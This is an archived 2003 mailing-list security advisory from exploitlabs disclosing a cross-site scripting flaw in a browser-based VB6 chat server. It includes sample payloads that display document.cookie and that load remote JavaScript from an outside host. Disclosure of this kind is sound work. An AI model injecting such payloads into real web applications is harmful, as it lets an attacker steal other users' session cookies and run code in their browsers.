[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Law11-OE50pOEuusqlf00023e08@hotmail.com>
Date: Fri, 15 Aug 2003 15:40:09 -0700
From: "morning_wood" <se_cur_ity@...mail.com>
To: <full-disclosure@...ts.netsys.com>, <bugtraq@...urityfocus.com>
Subject: CHAT SERVER - XSS push
------------------------------------------------------------------
- EXPL-A-2003-019 exploitlabs.com Advisory 019
------------------------------------------------------------------
-= CHAT SERVER =-
exploitlabs
Aug 08, 2003
Product:
--------
Chat Server ( by author of "Sleuth 1.4" )
http://sandsprite.com/codestuff.asp
download and vb6 sources:
http://sandsprite.com/CodeStuff/chatserver.zip
Vunerability(s):
----------------
1. XSS ( push through )
Description of product:
-----------------------
Web browser based chatserver similar
to the Magma Chatserver that powers huge
sights like chatropolis.com. This will show
just how they can stream text into a browser
and display it realtime. Have an unlimited
number of people all chatting at once using
only their web browsers :) pretty neat
chatserver is an server application
and runs by default on port 80
note: chatropolis.com is not affected
VUNERABILITY / EXPLOIT
======================
1. XSS is able to be "pushed" from one
chatter to another, with the results being
"forced" into any other chatters browser
for execution.
examples:
<script>alert("You are vunerable to xss ")</script>
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SC
RIPT>
<iframe src="http://whatismyip.com"></iframe>
<script language="JavaScript"
src="http://www.astalavista.com/backend/news.js"
type="text/javascript"></script>
note: the last one is remote code.
the vunerability exists in the sample provided and after compiling from
the provided sources.
Local:
------
yes
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor Contact:
---------------
Concurrent with this advisory
dzzie@...oo.com
Vendor Response:
----------------
:)
Credits:
--------
Donnie Werner
morning_wood@...labs.com
http://e2-labs.com
http://exploitlabs.com
original advisory may be obtained at
http://exploitlabs.com/files/advisories/EXPL-A-2003-019-chatserver.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists